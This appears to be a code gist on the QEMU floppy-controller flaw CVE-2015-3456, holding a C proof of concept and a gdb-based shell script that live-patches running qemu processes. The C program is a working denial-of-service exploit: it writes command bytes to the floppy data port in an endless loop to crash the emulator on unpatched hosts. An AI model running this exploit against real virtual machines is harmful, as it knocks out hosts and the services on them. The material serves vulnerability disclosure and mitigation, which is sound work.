@vincentbernat
CVE-2015-3456 "exploit"
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/io.h>
/**
* "Exploit" for CVE-2015-3456. This will only crash the VM. Compile with:
* gcc -Wall -std=c99 cve-2015-3456.c -o cve-2015-3456
*/
/* Data register of the primary PC floppy disk controller; the only port the
 * program touches, so ioperm() below requests exactly one byte of access. */
#define FDC_IOPORT 0x3f5
/* FDC command byte that the program writes (READ ID); the loop below writes
 * the same value as a bare literal. */
#define FD_CMD_READ_ID 0x0a
/*
 * Denial-of-service proof of concept for CVE-2015-3456 (see header comment):
 * opens raw access to the FDC data port and writes command bytes to it in an
 * endless loop. On an unpatched host the guest's emulator aborts; on a patched
 * host the loop simply never terminates. Returns only on ioperm() failure.
 */
int main() {
    /* Spinner glyphs cycled on the status line while the loop runs. */
    char progress[] = { '|', '\\', '-', '/' };
    /* Raw port I/O from user space requires CAP_SYS_RAWIO in the guest
     * (normally root); without it ioperm() fails and we bail out here. */
    if (ioperm(FDC_IOPORT, 1, 1) == -1) {
        fprintf(stderr, "[!] Unable to set port access permissions: %m\n");
        exit(EXIT_FAILURE);
    }
    /* First command byte to the controller. */
    outb(FD_CMD_READ_ID, FDC_IOPORT);
    fprintf(stdout, "[.] Overflow...");
    /* No exit condition: the loop runs until the VM is stopped or crashes. */
    for (size_t i = 0;; i++) {
        if (i%10000 == 0)
            fprintf(stdout, "\r[%c]", progress[(i/10000)%sizeof(progress)]);
        /* NOTE(review): not inside the if above, so stdout is flushed on
         * every iteration, not only when the spinner is redrawn. */
        fflush(stdout);
        outb(0xa, FDC_IOPORT);           /* same value as FD_CMD_READ_ID */
    }
    /* Unreachable: the loop above has no break. */
    fprintf(stdout, "\n");
    return 0;
}
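#!/bin/sh
# Will patch all running qemu for CVE-2015-3456. No detection of
# vulnerable processes, all processes are patched. This is harmless
# for already patched processes as long as you don't need the FDC:
# every entry of command_to_handler is pointed at entry 0, so the
# emulated floppy controller stops accepting any command.
# Look for the command_to_handler symbol. Need the debug symbols.
#
# Must run as a user allowed to ptrace the qemu processes (normally root).
# The generated gdb script goes to a temporary file that is removed on exit.

set -u

QEMU=$(command -v qemu-system-x86_64 || true)
PIDS=$(pidof qemu-system-x86_64 || true)

# Nothing to attach to: say so instead of running gdb with an empty script.
if [ -z "$PIDS" ]; then
    echo "No running qemu-system-x86_64 process found; nothing to patch." >&2
    exit 0
fi

SCRIPT=$(mktemp) || exit 1
trap 'rm -f "$SCRIPT"' EXIT INT TERM

(
# Quoted delimiter: gdb's own $i must not be expanded by the shell.
#
# The sanity checks are two explicitly nested `if`/`else`/`end` blocks. gdb's
# script reader recognizes only a bare `else` line, so a combined
# `else if ... then` line is not a branch: it leaves the first-byte check
# without effect and is executed as a (non-existent) `else` command when the
# size check fails.
cat <<'EOF'
set height 0
set width 0
set verbose off
define patch
if sizeof(command_to_handler) != 256
printf "Size of command_to_handler is not 256 (%d)\n", sizeof(command_to_handler)
else
if command_to_handler[0] != 0x1f
printf "First byte of command_to_handler is not 0x1f (%x)\n", command_to_handler[0]
else
set $i = 1
while ($i < 256)
set variable command_to_handler[$i++] = command_to_handler[0]
end
printf "Done!\n"
end
end
end
document patch
Fix CVE-2015-3456.
end
EOF
# Unquoted delimiter: $pid is expanded by the shell here.
for pid in $PIDS; do
cat <<EOF
attach $pid
printf "Handling PID %d\n", $pid
patch
detach
EOF
done
) > "$SCRIPT"

# $QEMU is deliberately unquoted: when the binary is not in PATH it expands
# to nothing and gdb resolves the executable from the attached process.
gdb --batch --command="$SCRIPT" $QEMU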